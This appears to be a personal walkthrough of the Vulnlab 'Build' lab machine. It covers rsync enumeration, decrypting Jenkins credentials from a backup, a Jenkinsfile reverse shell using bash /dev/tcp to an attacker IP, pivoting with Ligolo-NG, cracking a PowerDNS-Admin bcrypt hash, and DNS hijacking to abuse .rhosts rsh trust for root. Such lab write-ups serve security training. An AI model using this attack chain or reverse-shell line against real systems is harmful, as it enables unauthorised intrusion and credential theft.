Here is my notes on BUILD box from Vulnlab which deployed to Hackthebox.
BUILD: 10.10.109.211
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 472173e26b96cdf91311af40c84dd67f (ECDSA)
|_ 256 2b5ebaf372d3b309df25412909f47bf5 (ED25519)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell Netkit rshd
873/tcp open rsync (protocol version 31)
┌──(root㉿kali)-[/home/kali/VULNLAB/BUILD]
└─# rsync -av rsync://10.10.109.211/
backups backups
┌──(root㉿kali)-[/home/kali/VULNLAB/BUILD/10.10.109.211]
└─# rsync -av --list-only rsync://10.10.109.211/backups
receiving incremental file list
drwxr-xr-x 4,096 2024/05/02 09:26:31 .
-rw-r--r-- 376,289,280 2024/05/02 09:26:19 jenkins.tar.gz
sent 24 bytes received 82 bytes 70.67 bytes/sec
total size is 376,289,280 speedup is 3,549,898.87
┌──(root㉿kali)-[/home/…/VULNLAB/BUILD/10.10.109.211/backups]
└─# rsync -av rsync://10.10.109.211/backups/jenkins.tar.gz ./jenkins.tar.gz
receiving incremental file list
jenkins.tar.gz
sent 43 bytes received 376,381,250 bytes 1,327,623.61 bytes/sec
total size is 376,289,280 speedup is 1.00
┌──(root㉿kali)-[/home/…/VULNLAB/BUILD/10.10.109.211/backups]
└─# mv jenkins.tar.gz jenkins.tar
┌──(root㉿kali)-[/home/…/VULNLAB/BUILD/10.10.109.211/backups]
└─# tar -xf jenkins.tar
┌──(root㉿kali)-[/home/…/VULNLAB/BUILD/10.10.109.211/backups]
└─# ls
jenkins_configuration jenkins.tar
jenkins_configuration:
Found config.xml, master.key and hudson.util.Secret from secrets of jenkins_configuration directories.
./jenkins-credentials-decryptor -m master.key -s hudson.util.Secret -c config.xml
There are two config.xml in this directory.
one the first thing you see and the second one is hidden.
grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
┌──(root㉿kali)-[/home/…/BUILD/10.10.109.211/backups/jenkins_configuration]
└─# grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
jobs/build/config.xml: <password>{AQAAABAAAAAQUNBJaKiUQNaRbPI0/VMwB1cmhU/EHt0chpFEMRLZ9v0=}</password>
The second config.xml in jobs directory is the one you need.
┌──(root㉿kali)-[/home/…/VULNLAB/BUILD/10.10.109.211/backups]
└─# ./jenkins-credentials-decryptor -m master.key -s hudson.util.Secret -c config.xml
[
{
"id": "e4048737-7acd-46fd-86ef-a3db45683d4f",
"password": "Git1234!",
"username": "buildadm"
}
]
#Only config.xml in jobs/build/config.xml works to decrypt the credential.
buildadm credential discovered !
https://cloud.hacktricks.xyz/pentesting-ci-cd/jenkins-security
#BUILD-VL
buildadm:Git1234!
3000/tcp open ppp
-Gitea service.
-Gitea Version 1.21.11
-No exploits about that unforunately.
-Create an account and see if there are an interesting repositories.
-No interesting repositories = NOPE !
buildadm:Git1234! - Administrator for gitea.
Jenkins Pipeline Reverse Shell:
Found buildadm/dev repository:
Jenkinsfile = Jenkin Pipeline
Webhooks = http://10.10.109.211:3000/buildadm/dev/settings/hooks/1
Could be Jenkins server connect to Jenkinsfile.
We can mod Jenkinsfile and wait for shell for a minute or two:
pipeline {
agent any
stages {
stage('Pwned') {
steps {
sh '''
bash -c 'bash -i >& /dev/tcp/10.8.0.71/1234 0>&1'
'''
}
}
}
}
https://blog.apolloteapot.com/vulnlab-build
https://cloud.hacktricks.xyz/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline
┌──(root㉿kali)-[/home/kali/VULNLAB/BUILD]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.109.211] 41292
bash: cannot set terminal process group (7): Inappropriate ioctl for device
bash: no job control in this shell
root@5ac6c7d6fb8e:/var/jenkins_home/workspace/build_dev_main# whoami
whoami
root
root@5ac6c7d6fb8e:/var/jenkins_home/workspace/build_dev_main# hostname
hostname
5ac6c7d6fb8e
root@5ac6c7d6fb8e:/var/jenkins_home/workspace/build_dev_main#
DOCKER-ROOT SHELL !
root@5ac6c7d6fb8e:~# whoami
whoami
root
root@5ac6c7d6fb8e:~# hostname
hostname
5ac6c7d6fb8e
root@5ac6c7d6fb8e:~# pwd
pwd
/root
root@5ac6c7d6fb8e:~# ls
ls
user.txt
root@5ac6c7d6fb8e:~# cat user.txt
cat user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
Docker Escape:
cat /etc/proc/arp
cat /etc/proc/route
Check if there are an external docker containers that communicate to the within current docker container that the tester has and in.
Think of like Docker Network Evironment that involve simliarly to Post-Exploitation, Privilege Escalation and Lateral Movement !
root@5ac6c7d6fb8e:~# cat /proc/net/arp
cat /proc/net/arp
IP address HW type Flags HW address Mask Device
172.18.0.1 0x1 0x2 02:42:2b:1a:b5:36 * eth0
172.18.0.2 0x1 0x2 02:42:ac:12:00:02 * eth0
root@5ac6c7d6fb8e:~# ls -lah
ls -lah
total 20K
drwxr-xr-x 3 root root 4.0K May 2 2024 .
drwxr-xr-x 1 root root 4.0K May 9 18:50 ..
lrwxrwxrwx 1 root root 9 May 1 2024 .bash_history -> /dev/null
-r-------- 1 root root 35 May 1 2024 .rhosts
drwxr-xr-x 2 root root 4.0K May 1 2024 .ssh
-rw------- 1 root root 37 May 1 2024 user.txt
root@5ac6c7d6fb8e:~# cat .rhosts
cat .rhosts
admin.build.vl +
intern.build.vl +
Ligolo-NG as usual:
sudo ip tuntap add user kali mode tun ligolo
./proxy -selfcert -laddr 0.0.0.0:53
sudo ip link set ligolo up
sudo ip route add 172.18.0.0/24 dev ligolo
./agent -connect 10.8.0.71:53 -ignore-cert &
Docker-1: 172.18.0.1
┌──(root㉿kali)-[/home/kali/VULNLAB/BUILD]
└─# sudo nmap 172.18.0.1
Starting Nmap 7.93 ( https://nmap.org ) at 2024-11-06 16:32 EST
Nmap scan report for 172.18.0.1
Host is up (0.48s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
512/tcp open exec
513/tcp open login
514/tcp open shell
873/tcp open rsync
3000/tcp open ppp
3306/tcp open mysql
#Empty ROOT Password.
┌──(root㉿kali)-[/home/kali/VULNLAB/BUILD/10.10.109.211]
└─# mysql -u root -p '' -h 172.18.0.1
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 21
Server version: 11.3.2-MariaDB-1:11.3.2+maria~ubu2204 mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB []> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| powerdnsadmin | #Interesting.
| sys |
+--------------------+
5 rows in set (0.130 sec)
use powerdnsadmin;
MariaDB [powerdnsadmin]> select * from domain;
+----+----------+--------+--------+------------+-----------------+------------+--------+------------+
| id | name | master | type | serial | notified_serial | last_check | dnssec | account_id |
+----+----------+--------+--------+------------+-----------------+------------+--------+------------+
| 1 | build.vl | [] | Native | 2024050201 | 0 | 0 | 0 | NULL |
+----+----------+--------+--------+------------+-----------------+------------+--------+------------+
1 row in set (0.130 sec)
MariaDB [powerdnsadmin]> select * from records;
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| id | domain_id | name | type | content | ttl | prio | disabled | ordername | auth |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| 8 | 1 | db.build.vl | A | 172.18.0.4 | 60 | 0 | 0 | NULL | 1 |
| 9 | 1 | gitea.build.vl | A | 172.18.0.2 | 60 | 0 | 0 | NULL | 1 |
| 10 | 1 | intern.build.vl | A | 172.18.0.1 | 60 | 0 | 0 | NULL | 1 |
| 11 | 1 | jenkins.build.vl | A | 172.18.0.3 | 60 | 0 | 0 | NULL | 1 |
| 12 | 1 | pdns-worker.build.vl | A | 172.18.0.5 | 60 | 0 | 0 | NULL | 1 |
| 13 | 1 | pdns.build.vl | A | 172.18.0.6 #Interesting Target. | 60 | 0 | 0 | NULL | 1 |
| 14 | 1 | build.vl | SOA | a.misconfigured.dns.server.invalid hostmaster.build.vl 2024050201 10800 3600 604800 3600 | 1500 | 0 | 0 | NULL | 1 |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
MariaDB [powerdnsadmin]> select * from user;
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| id | username | password | firstname | lastname | email | otp_secret | role_id | confirmed |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| 1 | admin | $2b$12$s1hK0o7YNkJGfu5poWx.0u1WLqKQIgJOXWjjXz7Ze3Uw5Sc2.hsEq | admin | admin | admin@build.vl | NULL | 1 | 0 |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
1 row in set (0.124 sec)
┌──(root㉿kali)-[/home/kali/VULNLAB/BUILD/10.10.109.211]
└─# cat hash.txt
admin:$2b$12$s1hK0o7YNkJGfu5poWx.0u1WLqKQIgJOXWjjXz7Ze3Uw5Sc2.hsEq
┌──(root㉿kali)-[/home/kali/VULNLAB/BUILD/10.10.109.211]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
winston (admin)
1g 0:00:00:46 DONE (2024-11-06 16:38) 0.02134g/s 28.43p/s 28.43c/s 28.43C/s winston..incubus
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
admin:winston
Docker-6: 172.18.0.6
┌──(root㉿kali)-[/home/kali/VULNLAB/BUILD]
└─# sudo nmap 172.18.0.6
Starting Nmap 7.93 ( https://nmap.org ) at 2024-11-06 16:35 EST
Nmap scan report for 172.18.0.6
Host is up (0.45s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
#powerdnsadmin web service.
admin:winston #From MySQL.
DNS Hijacking:
.rhosts from root-docker:
root@5ac6c7d6fb8e:~# ls -lah
ls -lah
total 20K
drwxr-xr-x 3 root root 4.0K May 2 2024 .
drwxr-xr-x 1 root root 4.0K May 9 18:50 ..
lrwxrwxrwx 1 root root 9 May 1 2024 .bash_history -> /dev/null
-r-------- 1 root root 35 May 1 2024 .rhosts
drwxr-xr-x 2 root root 4.0K May 1 2024 .ssh
-rw------- 1 root root 37 May 1 2024 user.txt
root@5ac6c7d6fb8e:~# cat .rhosts
cat .rhosts
admin.build.vl +
intern.build.vl +
DNS Hijacking:
Assign admin.build.vl to Kali then run rsh as a root user to target due to .rhosts and DNS table.
└─# dig admin.build.vl @10.10.125.25
; <<>> DiG 9.18.16-1-Debian <<>> admin.build.vl @10.10.125.25
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 11979
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;admin.build.vl. IN A
;; ANSWER SECTION:
admin.build.vl. 60 IN A 10.8.0.71
;; Query time: 123 msec
;; SERVER: 10.10.125.25#53(10.10.125.25) (UDP)
;; WHEN: Wed Nov 06 16:49:53 EST 2024
;; MSG SIZE rcvd: 59
Rsh Notes: #TCP Ports: 512,513 and 514.
https://book.hacktricks.xyz/network-services-pentesting/pentesting-rsh
https://blog.apolloteapot.com/vulnlab-build
Rsh Command with Examples in Linux
root@5ac6c7d6fb8e:~# ls -lah
ls -lah
total 20K
drwxr-xr-x 3 root root 4.0K May 2 2024 .
drwxr-xr-x 1 root root 4.0K May 9 18:50 ..
lrwxrwxrwx 1 root root 9 May 1 2024 .bash_history -> /dev/null
-r-------- 1 root root 35 May 1 2024 .rhosts
drwxr-xr-x 2 root root 4.0K May 1 2024 .ssh
-rw------- 1 root root 37 May 1 2024 user.txt
root@5ac6c7d6fb8e:~# cat .rhosts
cat .rhosts
admin.build.vl +
intern.build.vl +
rsh root@10.10.125.25
[SNIP]
root@build:~# whoami
root
root@build:~# hostname
build
[SNIP]
ROOT-SHELL !
root@build:~# whoami
root
root@build:~# hostname
build
root@build:~# ls
root.txt scripts snap
root@build:~# cat root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
Nmap done: 1 IP address (1 host up) scanned in 2.50 seconds
8081/tcp open blackice-icecap
Found gitea or any other git sites ? Create an account and check public repositories to gather more interesting informations for enumeration.
Admin account for gitea or any other git sites ? Check webhook of the repositories, either public or private, to see if the external program use it.
The tester could take an advantage and exploit it.
For Users of git sites, either give an administrator permission or certain privilege that enough to control some repositories to run this kind of exploit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel